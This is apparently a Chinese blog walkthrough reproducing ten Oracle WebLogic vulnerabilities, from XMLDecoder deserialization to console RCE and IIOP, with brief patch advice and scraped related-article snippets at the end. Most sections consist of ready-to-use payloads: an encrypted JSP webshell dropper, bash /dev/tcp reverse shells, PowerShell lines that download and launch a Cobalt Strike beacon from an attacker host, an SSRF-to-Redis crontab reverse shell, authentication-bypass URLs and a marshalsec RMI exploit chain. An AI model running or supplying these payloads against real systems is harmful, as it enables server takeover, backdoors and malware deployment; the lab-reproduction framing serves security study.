     <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
     <java><java version="1.4.0" class="java.beans.XMLDecoder">
     <object class="java.io.PrintWriter"> 
     <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/zcc.jsp</string>
     <void method="println">
    <string>
     <![CDATA[
    <%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
     ]]>
     </string>
     </void>
     <void method="close"/>
     </object></java></java>
     </work:WorkContext>
     </soapenv:Header>
     <soapenv:Body/>
    </soapenv:Envelope>
    

    image-20210809162737924

    image-20210809162717485

    实现Linux反弹shell的poc:

    POST /wls-wsat/CoordinatorPortType HTTP/1.1
    Host: x.x.x.x:7001
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Content-Type: text/xml
    Content-Length: 637
    
    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
    <java version="1.4.0" class="java.beans.XMLDecoder">
    <void class="java.lang.ProcessBuilder">
    <array class="java.lang.String" length="3">
    <void index="0">
    <string>/bin/bash</string>
    </void>
    <void index="1">
    <string>-c</string>
    </void>
    <void index="2">
    <string>bash -i &gt;&amp; /dev/tcp/x.x.x.x/4444 0&gt;&amp;1</string>
    </void>
    </array>
    <void method="start"/></void>
    </java>
    </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
    </soapenv:Envelope>
    

    实现win上线cs

    POST /wls-wsat/CoordinatorPortType HTTP/1.1
    Host: 192.168.10.154:7001
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Content-Type: text/xml
    Content-Length: 704
    
    
    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
    <java version="1.4.0" class="java.beans.XMLDecoder">
    <void class="java.lang.ProcessBuilder">
    <array class="java.lang.String" length="3">
    <void index="0">
    <string>powershell</string>
     </void>
     <void index="1">
     <string>-Command</string>
     </void>
     <void index="2">
     <string>(new-object System.Net.WebClient).DownloadFile('http://192.168.10.65/zcc.exe','zcc.exe');start-process zcc.exe</string>
    </void>
    </array>
    <void method="start"/></void>
    </java>
    </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
    </soapenv:Envelope>
    

    cs生成后门木马

    image-20210810105923024

    放在kali上,开启简易的http服务

    image-20210810110037377

    powershell上线cs:

    powershell -Command (new-object System.Net.WebClient).DownloadFile('http://192.168.10.65/zcc.exe','zcc.exe');start-process zcc.exe
    

    image-20210810111100065

    image-20210810110916447

    成功上线cs

    安全防护

    前往Oracle官网下载10月份所提供的安全补丁:

    http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html

    2.XMLDecoder 反序列化漏洞 CVE-2017-3506

    漏洞简介

    cve-2017-10271与3506他们的漏洞原理是一样的,只不过10271绕过了3506的补丁,CVE-2017-3506的补丁加了验证函数,验证Payload中的节点是否存在object Tag。

    private void validate(InputStream is){
     WebLogicSAXParserFactory factory = new WebLogicSAXParserFactory();
     try {
     SAXParser parser =factory.newSAXParser();
     parser.parse(is, newDefaultHandler() {
     public void startElement(String uri, StringlocalName, String qName, Attributes attributes)throws SAXException {
     if(qName.equalsIgnoreCase("object")) {
     throw new IllegalStateException("Invalid context type: object");
     }
     }
     });
     } catch(ParserConfigurationException var5) {
     throw new IllegalStateException("Parser Exception", var5);
     } catch (SAXExceptionvar6) {
     throw new IllegalStateException("Parser Exception", var6);
     } catch (IOExceptionvar7) {
     throw new IllegalStateException("Parser Exception", var7);
     }
     }
    
    影响版本
    10.3.6.0
    12.1.3.0
    12.2.1.0
    12.2.1.1 
    12.2.1.2
    
    漏洞复现

    利用的poc:

    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
     <soapenv:Header>
     <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
     <java>
     <object class="java.io.PrintWriter">
     <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/zcc3.jsp</string>
     <void method="println">
     <string>
     <![CDATA[
     <% out.print("zcc1 hello"); %>
     ]]>
     </string>
     </void>
     <void method="close"/>
     </object>
     </java>
     </work:WorkContext>
     </soapenv:Header>
     <soapenv:Body/>
    </soapenv:Envelope>
    

    image-20210810141515224

    安全防护

    前往Oracle官网下载10月份所提供的安全补丁:

    http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html

    3.wls-wsat反序列化远程代码执行漏洞 CVE-2019-2725

    漏洞简介

    此漏洞实际上是CVE-2017-10271的又一入口,CVE-2017-3506的补丁过滤了object;CVE-2017-10271的补丁过滤了new,method标签,且void后面只能跟index,array后面只能跟byte类型的class;CVE-2019-2725的补丁过滤了class,限制了array标签中的byte长度。

    影响组件
    bea_wls9_async_response.war
    wsat.war
    
    影响版本
    10.3.*
    12.1.3
    
    验证漏洞

    访问 /_async/AsyncResponseService,返回200则存在,404则不存在

    查看web.xml得知受影响的url如下:

    访问路径为:

    C:\Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\bea_wls9_async_response\8tpkys\war\WEB-INF
    

    image-20210810143210331

    /_async/AsyncResponseService
    /_async/AsyncResponseServiceJms
    /_async/AsyncResponseServiceHttps
    /_async/AsyncResponseServiceSoap12
    /_async/AsyncResponseServiceSoap12Jms
    /_async/AsyncResponseServiceSoap12Https
    
    漏洞复现

    访问该url,回显如下,说明存在漏洞

    image-20210810142738800

    win上线cs的poc如下,这里exe用的是上面生成的:

    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing"
    xmlns:asy="http://www.bea.com/async/AsyncResponseService">
    <soapenv:Header>
    <wsa:Action>xx</wsa:Action>
    <wsa:RelatesTo>xx</wsa:RelatesTo>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
    <void class="java.lang.ProcessBuilder">
    <array class="java.lang.String" length="3">
    <void index="0">
    <string>powershell</string>
    </void>
    <void index="1">
    <string>-Command</string>
    </void>
    <void index="2">
    <string>(new-object System.Net.WebClient).DownloadFile('http://192.168.10.65/zcc1.exe','zcc1.exe');start-process zcc1.exe</string>
    </void>
    </array>
    <void method="start"/></void>
    </work:WorkContext>
    </soapenv:Header><soapenv:Body>
    <asy:onAsyncDelivery/>
    </soapenv:Body></soapenv:Envelope>
    

    安全防护

    1、升级本地JDK环境

    2、及时安装官方补丁

    4.WebLogic T3协议反序列化命令执行漏洞 CVE-2018-2628

    漏洞简介

    远程攻击者可利用该漏洞在未授权的情况下发送攻击数据,通过T3协议(EJB支持远程访问,且支持多种协议。这是Web Container和EJB Container的主要区别)在Weblogic Server中执行反序列化操作,利用RMI(远程方法调用) 机制的缺陷,通过 JRMP 协议(Java Remote Messaging Protocol:java远程消息交换协议)达到执行任意反序列化 payload 的目的。

    影响版本
    10.3.6.0
    12.1.3.0
    12.2.1.1
    12.2.1.2
    
    相关漏洞
    CVE-2015-4852
    CVE-2016-0638
    CVE-2016-3510
    CVE-2017-3248
    CVE-2018-2893
    CVE-2016-0638
    
    验证漏洞

    使用脚本跑,脚本运行需python2环境,出现如下图所示的回显时,说明存在该漏洞;

    脚本链接:https://github.com/shengqi158/CVE-2018-2628

    image-20210810160702675

    image-20210810160718697

    漏洞复现

    windows-getshell,使用k8weblogicGUI.exe

    image-20210810163031055

    这里出了点问题,文件名改成了1.jsp

    image-20210810164738168

    用脚本连接得到交互shell,脚本运行需python2环境

    脚本链接:https://github.com/jas502n/CVE-2018-2628

    image-20210810165228766

    在此处上线cs,用的依旧是上面的马,改名zcc3.exe

    powershell -Command (new-object System.Net.WebClient).DownloadFile('http://192.168.10.65/zcc3.exe','zcc3.exe');start-process zcc3.exe
    

    image-20210810170001387

    image-20210810170039655

    安全防护

    过滤t3协议,再域结构中点击 安全->筛选器,选择筛选器填:

    weblogic.security.net.ConnectionFilterImpl
    

    image-20210813140332501

    保存后重启weblogic即可。

    5.WebLogic 未授权访问漏洞(CVE-2018-2894)

    漏洞简介

    Weblogic Web Service Test Page中有两个未授权页面,可以上传任意文件。但是有一定的限制,该页面在开发模式下存在,在生产模式下默认不开启,如果是生产模式,需要登陆后台进行勾选启动web服务测试页,如下图。

    image-20210813145148182

    影响版本
    10.3.6
    12.1.3
    12.2.1.2
    12.2.1.3
    
    验证漏洞

    测试页有两个

    /ws_utc/config.do
    /ws_utc/begin.do
    
    漏洞复现

    这里要注意的是12版本,以前以及现在的默认安装是“开发模式”,“生产模式”下没有这两处上传点。如果是生产模式,需要登陆后台进行如下配置:(开发环境下不需要!!)

    image-20210814171049349

    勾选启用web服务测试项,保存重启weblogic即可

    1.测试/ws_utc/config.do

    访问/ws_utc/config.do页面,首先设置一下路径,设置Work Home Dir为ws_utc应用的静态文件css目录,因为默认上传目录不在Web目录无法执行webshell,这里设置为:(css访问不需要任何权限)

    C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\com.oracle.webservices.wls.ws-testclient-app-wls_12.1.3\cmprq0\war\css
    

    image-20210813152013436

    提交后,点击左边安全->添加,上传jsp大马

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-kCSDZN6W-1628955549528)(C:/Users/zcc/AppData/Roaming/Typora/typora-user-images/image-20210814172122333.png)]

    获取文件id:1628933663766

    访问url:

    http://192.168.0.105/:7001/ws_utc/css/config/keystore/{时间戳}_{文件名}
    http://192.168.0.105:7001/ws_utc/css/config/keystore/1628933663766_JspSpy.jsp
    

    image-20210814173547786

    输入密码

    image-20210814173903964

    image-20210814174004800

    可以看见成功上线,同样方法也可以上传一句话或者其他木马。

    2.测试 /ws_utc/begin.do

    大致方法和上面的url一样,这里需要注意的是

    1./ws_utc/begin.do使用的工作目录是在/ws_utc/config.do中设置的Work Home Dir;
    2.利用需要知道部署应用的web目录;
    3.在生产模式下不开启,后台开启后,需要认证。
    

    image-20210814175127172

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ekdcnRrr-1628955549531)(C:/Users/zcc/AppData/Roaming/Typora/typora-user-images/image-20210814175507654.png)]

    image-20210814180116136

    报错可以忽略,返回包中已有文件路径

    /css/upload/RS_Upload_2021-08-14_17-59-33_143/import_file_name_zcccmd.jsp
    

    image-20210814180054350

    访问路径,成功访问,powershell上线cs

    http://192.168.0.105:7001/ws_utc/css/upload/RS_Upload_2021-08-14_17-59-33_143/import_file_name_zcccmd.jsp
    

    powershell -Command (new-object System.Net.WebClient).DownloadFile('http://192.168.0.108/zcc.exe','zcc.exe');start-process zcc.exe
    

    image-20210814181718937

    安全防护

    1.启动生产模式后Config.do页面登录授权后才可访问

    2.升级到最新版本,目前生产模式下已取消这两处上传文件的地方。

    6.Weblogic SSRF漏洞(CVE-2014-4210)

    漏洞简介

    Oracle WebLogic Web Server既可以被外部主机访问,同时也允许访问内部主机。比如有一个jsp页面SearchPublicReqistries.jsp,我们可以利用它进行攻击,未经授权通过weblogic server连接任意主机的任意TCP 端口,可以能冗长的响应来推断在此端口上是否有服务在监听此端口,进而攻击内网中redis、fastcgi等脆弱组件。

    影响版本
    10.0.2.0
    10.3.6.0
    
    验证漏洞

    访问该路径,如果能正常访问,说明存在该漏洞

    /uddiexplorer/SearchPublicRegistries.jsp
    

    image-20210814185115833

    漏洞复现

    这里复现用的vulhub靶场环境

    抓包,在url后跟端口,把url修改为自己搭建的服务器地址,访问开放的7001端口

    image-20210814192248494

    image-20210814192515111

    发现返回如下信息,说明开放7001端口,但是不是http协议

    An error has occurred<BR>weblogic.uddi.client.structures.exception.XML_SoapException: The server at http://127.0.0.1:7001 returned a 404 error code &#40;Not Found&#41;.  Please ensure that your URL is correct, and the web service has deployed without error.	
    

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-qcf90c57-1628955549535)(C:/Users/zcc/AppData/Roaming/Typora/typora-user-images/image-20210814192706701.png)]

    访问未开放的端口,会返回下面的信息

    An error has occurred<BR>weblogic.uddi.client.structures.exception.XML_SoapException: Tried all: &#39;1&#39; addresses, but could not connect over HTTP to server: &#39;127.0.0.1&#39;, port: &#39;7002&#39;
    

    image-20210814193417626

    访问存在的端口,且为http协议时返回如下

    An error has occurred<BR>
    weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://192.168.0.108:80 which did not have a valid SOAP content-type: text/html.
    

    image-20210814203203147

    7.weblogic SSRF联动Redis

    漏洞复现

    依旧用的上面这个靶场

    image-20210814204005054

    这里查一下开启redis服务的这个容器IP,找到ip:172.20.0.2

    docker inspect a5a
    

    image-20210814204200558

    可以看见6379的端口存在,且为http协议

    image-20210814204413085

    本机监听12345端口

    image-20210814204756777

    burp改包直接将弹shell脚本到本机kail上(192.168.0.104)

    set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.0.104/12345 0>&1\n\n\n\n"
    config set dir /etc/
    config set dbfilename crontab
    save
    

    经过url编码后,写入bp中operator参数的后面:

    operator=http://172.20.0.2:6379/test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.0.104%2F12345%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa
    

    image-20210814210942824

    image-20210814211117689

    反弹shell成功。

    安全防护

    升级高版本。

    8.Weblogic弱口令&&后台getshell

    漏洞简介

    由于管理员的安全意识不强,或者配置时存在疏忽,会导致后台存在弱口令或者默认的用户名/口令。

    影响版本

    全版本

    漏洞复现

    通过弱口令登录管理台后,点击部署->安装

    image-20210814212040819

    image-20210814212434754

    image-20210814212521338

    这里war包成功上传

    image-20210814212645817

    将其作为应用程序安装

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-OITKEniW-1628955549540)(C:/Users/zcc/AppData/Roaming/Typora/typora-user-images/image-20210814212857889.png)]

    image-20210814212917962

    点击完成。

    image-20210814213012827

    可以看见部署成功,访问url

    http://192.168.0.105:7001/zcc/JspSpy.jsp
    

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ZGL6D3sJ-1628955549541)(C:/Users/zcc/AppData/Roaming/Typora/typora-user-images/image-20210814214222692.png)]

    输入密码,即可成功拿到webshell

    image-20210814214304327

    安全防护

    避免出现弱口令

    9.Weblogic Console HTTP协议远程代码执行漏洞(CVE-2020-14882/CVE-2020-14883)

    漏洞简介

    未经身份验证的远程攻击者可能通过构造特殊的 HTTP GET请求,利用该漏洞在受影响的 WebLogic Server 上执行任意代码。它们均存在于WebLogic的Console控制台组件中。此组件为WebLogic全版本默认自带组件,且该漏洞通过HTTP协议进行利用。将CVE-2020-14882和CVE-2020-14883进行组合利用后,远程且未经授权的攻击者可以直接在服务端执行任意代码,获取系统权限。

    影响版本
    10.3.6.0
    12.1.3.0
    12.2.1.3
    12.2.1.4
    14.1.1.0
    
    漏洞复现

    CVE-2020-14883: 权限绕过漏洞的poc:

    http://192.168.0.105:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=AppDeploymentsControlPage&handle=com.bea.console.handles.JMXHandle%28%22com.bea%3AName%3Dbase_domain%2CType%3DDomain%22%29
    

    访问该url之后,进入如下页面,可以看见成功进入管理台:

    image-20210814220636352

    CVE-2020-14882: 代码执行漏洞的poc:

    http://192.168.0.106:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.
    mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27touch /tmp/zcc123%27);%22);
    

    这里复现用的vulhub靶场

    image-20210814222333621

    访问报404,不要慌,此时去容器中看会发现文件已成功写入;

    image-20210814221311713

    这里执行反弹shell的xml文件poc.xml:

    ## poc.xml
    <beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
      <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
          <list>
            <value>/bin/bash</value>
            <value>-c</value>
            <value><![CDATA[bash -i >& /dev/tcp/192.168.0.104/6669 0>&1]]></value>
          </list>
        </constructor-arg>
      </bean>
    </beans>
    

    把poc.xml放在打开http服务的kali机子上(ip:192.168.0.108):

    在监听机子上开启监听:

    image-20210814223442393

    然后访问该url:

    http://192.168.0.106:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.bea.core.repackaged
    .springframework.context.support.ClassPathXmlApplicationContext("http://192.168.0.108/poc.xml")
    

    image-20210814224224450

    同理,上线cs的话把反弹的命令改了即可。

    安全防护

    升级官方补丁:https://www.oracle.com/security-alerts/cpuoct2020.html

    10.IIOP反序列化漏洞(CVE-2020-2551)

    漏洞简介

    2020年1月15日,Oracle官方发布2020年1月关键补丁更新公告CPU(CriticalPatch Update),其中CVE-2020-2551的漏洞,漏洞等级为高危,CVVS评分为9.8分,漏洞利用难度低。IIOP反序列化漏洞影响的协议为IIOP协议,该漏洞是由于调用远程对象的实现存在缺陷,导致序列化对象可以任意构造,在使用之前未经安全检查,攻击者可以通过 IIOP 协议远程访问 Weblogic Server 服务器上的远程接口,传入恶意数据,从而获取服务器权限并在未授权情况下远程执行任意代码.

    影响版本
    10.3.6.0
    12.1.3.0
    12.2.1.3
    12.2.1.4
    
    漏洞复现

    需要安装java8环境

    cd /opt
    curl http://www.joaomatosf.com/rnp/java_files/jdk-8u20-linux-x64.tar.gz -o jdk-8u20-linux-x64.tar.gz
    tar zxvf jdk-8u20-linux-x64.tar.gz
    rm -rf /usr/bin/java*
    ln -s /opt/jdk1.8.0_20/bin/j* /usr/bin
    javac -version
    java -version
    

    这里我已经安装好

    image-20210814225849356

    exp.java代码

    import java.io.IOException;
    public class exp {
    	static{
    		try {
    			java.lang.Runtime.getRuntime().exec(new String[]{"cmd","/c","calc"});
    		} catch (IOException e) {
    			e.printStackTrace();
    		}
    	}
    	public static void main(String[] args) {
    		
    	}
    }
    

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-yc7EG4KA-1628955549544)(C:/Users/zcc/AppData/Roaming/Typora/typora-user-images/image-20210814230308993.png)]

    java编译exp.java

    javac exp.java -source 1.6 -target 1.6
    

    image-20210814230430269

    接着python开启http服务,与exp.class在同一文件夹即可

    image-20210814230710705

    使用marshalsec启动一个rmi服务

    java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.0.108/#exp" 12345
    

    image-20210814230935474

    使用工具weblogic_CVE_2020_2551.jar,执行exp

    java -jar weblogic_CVE_2020_2551.jar 192.168.0.105 7001 rmi://192.168.0.108:12345/exp
    

    image-20210814231847184

    可以看见成功弹出

    image-20210814231822800

    同理,上线cs的话,只需改exp.java代码即可,后续步骤一样

    import java.io.IOException;
    public class exp {
    	static{
    		try {
    			java.lang.Runtime.getRuntime().exec(new String[]{"powershell","/c"," (new-object System.Net.WebClient).DownloadFile('http://x.x.x.x/zcc.exe','zcc.exe');start-process zcc.exe"});
    		} catch (IOException e) {
    			e.printStackTrace();
    		}
    	}
    	public static void main(String[] args) {
    		
    	}
    }
    
    安全防护

    使用官方补丁进行修复:https://www.oracle.com/security-alerts/cpujan2020.html

    展开全文
  • 内网渗透-weblogic中间件系列漏洞

    千次阅读 2019-01-25 16:23:45
    WebLogic是美国Oracle公司出品的一个Application Server,确切的说是一个基于JAVAEE架构的中间件WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态...
  • 中间件WebLogic简介与概念

    千次阅读 2020-06-28 12:01:47
    将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。 BEA WebLogic Server拥有处理关键Web应用系统问题所需的性能、可扩展性和高可用性。 与BEAWebLogic Commerce ...
  • 前言接触过JAVA中间件的童鞋应该都知道,中间件在安装的时候都需要先安装JDK或者jre也就是说运行java中间件需要运行在java的运行环境中,具体来讲就是运行在java虚拟机上,也就我们通常所说JVM。因此中间件如果出现...
  • WebLogic是美国Oracle公司出品的一个application server,是一个基于JAVAEE架构的中间件WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和...
  • 中间件漏洞-weblogic

    2019-10-07 16:03:36
    确切的说是一个基于javaee架构的中间件weblogic是用于开发、集成、部署和管理大型分布式web应用、网络应用和数据库应用的java应用服务器,将java的动态功能和java enterprise标准的安全性引入大型网络应用的开发、...
  • 中间件安全之WebLogic

    2021-05-13 16:53:18
    中间件安全WebLogic安全漏洞任意文件上传漏洞(CVE-2018-2894)危害 WebLogic WebLogic是美国Oracle公司出品的一个applicationserver,确切的说是一个基于JAVAEE架构的中间件WebLogic是用于开发、集成、部署和管理...
  • Weblogic12C概述及安装

    2021-06-19 09:40:44
    文章目录一、Weblogic概述(1)Weblogic是什么(2)Weblogic的优点(3)Weblogic和Tomcat的对比(4)Weblogic的一些相关术语(5)Weblogic角色相关二、部署Weblogic(1)实验环境(2)实验步骤-部署weblogic-创建...
  • 项目发布到weblogic上时,classes会被打成jar,这就意味着当你取路径的时候中间目录不是文件夹而是jar。如果想获取原src下的配置文件,通过上述1234均无法正确获取!!! 发布之后的目录为: 此时的classes...
  • 简介 笔者当初为了学习JAVA,收集了很多经典源码,源码难易程度分为初级、中级、高级等,详情看源码列表,需要的可以直接下载! 这些源码反映了那时那景笔者对未来的盲目,对代码的热情、执着,对IT的憧憬、向往!...
  • 目前weblogic在世界application server市场上占有最大的份额,其他还有像方正ES2007、IBM的websphere,免费的tomcat、resin等中间件。  BEA WebLogic Server拥有处理关键Web应用系统问题所需的性能 、可扩展...
  • WebLogic_14.1.1.0.0.zip

    2020-10-13 18:29:27
    WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态...
  • WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态...
  • Weblogic入门

    万次阅读 多人点赞 2017-06-13 00:08:52
    Weblogic
  • WebLogic 12.1.3

    2018-07-23 10:40:29
    WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态...
  • WebLogic 是美国 Oracle 公司出品的一个 application server,确切的说是一个基于 JAVAEE 架构的中间件WebLogic 是用于开发、集成、部署和管理大型分布式 Web 应用、网络应用和数据库应用的 Java 应用服务器。...
  • weblogic10.03.6.0下载.txt

    2020-01-12 09:02:24
    开发部署中间件weblogic下载,经实践试用,没有任何问题。 WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件WebLogic是用于开发、集成、部署和管理大型分布式Web...
  • 中间件,weblogic,websphere 基本概念

    千次阅读 2008-11-23 20:45:00
    一:什么是中间件?在一个具体的应用项目之中,到底能不能够不用中间件?这也是中间件厂商经常被问到问题之一。之所以有此一问,说明了用户只是知道了中间件,听说其很重要,但并真正不知道什么是中间件? 我们最早...
  • WebLogic wls-async 反序列化远程命令执行漏洞(CNVD-C-2019-48814)漏洞复现WebLogic wls-async 反序列化远程命令执行漏洞(CNVD-C-2019-48814)0x01 weblogic简介0x02漏洞简介0x03 影响的系统0x04 复现过程1....
  • 什么是WebLogicWebLogic是美商Oracle的主要产品之一,是并购BEA得来,WebLogic是一个application server,确切的说是一个基于JAVAEE架构的中间件WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络...
  • 消息中间件

    2018-10-28 13:38:32
    1.消息中间件JMS 1.1什么是消息中间件 解耦,提高程序效率(生产者只需发送消息,执行速度快,消费者执行过程比较长,并且生产者不需要返回值结果) **消息中间件利用高效可靠的消息传递机制进行平台无关的数据交流,并...
  • weblogic是美国Oracle公司的一款产品,是一个基于JAVAEE架构的中间件。是用于开发、集成、部署 、管理大型分布式Web应用、网络应用、数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性...
  • WebLogic 12.2.1.3

    2018-07-23 10:33:03
    WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态...
  • 2019独角兽企业重金招聘Python工程师标准>>> ...
  • Weblogic是目前主流J2EE服务器之一,支持符合J2EE标准的各类应用程序(Application),其主要类型有: l Web模块:HTML网页、servlet、JSP网页、有关的Java类、标准的J2EE Web配置文件、Weblogic有关的配置文件如...
  • weblogic

    2018-11-20 18:18:44
    一、图形化weblogic 应用服务器,将做好的网站应用,需要发布到网上让其他人访问,那么我们就需要应用服务器,...WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,W...
  • SNMP是标准的网络管理协议,所有的标准厂商的设备(硬件、应用中间件)都支持这个协议标准,提供了各种设备的MIB信息库,以便于监控系统软件通过设备MIB库直接获取底层性能数据,达到实时监控的目的。目前支持SNMP...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 8,982
精华内容 3,592
关键字:

weblogic中间件标准